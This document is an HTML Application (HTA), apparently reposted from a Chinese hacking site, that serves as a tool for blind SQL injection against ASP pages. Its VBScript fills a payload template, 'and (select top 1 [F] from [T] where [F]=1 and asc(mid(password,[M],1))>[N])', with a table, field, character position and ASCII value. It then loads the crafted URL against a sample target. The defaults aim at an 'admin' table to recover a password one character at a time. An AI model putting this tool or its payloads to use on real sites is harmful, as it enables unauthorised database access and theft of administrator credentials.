<HEAD>
<TITLE> SQL Class Tools - By Sunhack</TITLE>
<HTA:APPLICATION ID="LiloHTA"
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
INGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">
<style>body{font-size:9pt;border:0pt}input{font-size:9pt}
.textbox {BORDER-BOTTOM: #00378A 2px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid}
.vbutton {BORDER-BOTTOM: 1px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid ;
padding-top:2pt;padding-bottom:-1pt}
</style>
<Script Language="vbScript">
<!--
Sub Main
Const HEIGHT = 840
Const WIDTH = 650
window.resizeTo HEIGHT, WIDTH
window.moveTo (screen.width - HEIGHT) / 2, (screen.height - WIDTH) / 2
End Sub
Function GetStrThis()
If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
GetStrThis= inSQL.Value
GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
Function GoCreak_onClick()
GoWhere.Location.Href="about:blank"
GoWhere.document.write "<center><font style=''font-size:9pt;color:RED''>Waitting For Open New URL...</font></center>"
GoWhere.Location.Href=GetStrThis
End Function
Function SoCreak_onClick()
Msgbox GetStrThis , 4096 ,"显示注入URL"
End Function
Function Show_onClick()
Msgbox String(23," ") & Chr(inCRM.Value) & String(25," ") , 0 ,"ASCII To CHAR"
End Function
Function Document_onClick()
''Window.Focus()
End Function
Function inENDStr()
If inEND.Value="" Then inEND.Value=" and ''''=''" Else inEND.Value=""
End Function
Function Document_onKeyPress()
If Window.Event.keyCode = 13 Then Call GoCreak_onClick()
End Function
Call Main
-->
</Script>
<Script Language="JavaScript">
function vSelect()
{ var GetThis = event.srcElement; return GetThis;}
</Script>
</HEAD>
<body scroll="no" style="margin-top:10pt">
<Center>
地址:<input type="text" name="inURL" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1" Class="textbox"><BR><BR>
[B]:<input type="text" name="inBAS" size="7" value="" Class="textbox">
[T]:<input type="text" name="inTAB" size="7" value="admin" Class="textbox">
[F]:<input type="text" name="inFIL" size="7" value="id" Class="textbox">
[M]:<input type="text" name="inNUM" size="7" value="1" Class="textbox"> [N]:
<input type="text" name="inCRM" size="7" Value="33" Class="textbox">
<input type="button" value=" 显示ASCII " name="Show" Class="vbutton">
[W]:<input type="text" name="inEND" size="10" value="" Class="textbox"> [<font color="Red" onClick="vbScript:inENDStr" Style="Cursor:hand">*</font>]
<br><br>
<input type="text" Class="textbox" name="inSQL" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<input type="button" value=" 尝试 " name="GoCreak" Class="vbutton">
<input type="button" value=" 显示 " name="SoCreak" Class="vbutton">
<br><BR>
<iframe align=center name="GoWhere" frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>
文章转载地址:http://www.cnpaf.net/Class/hack/05121820345198885244.htm
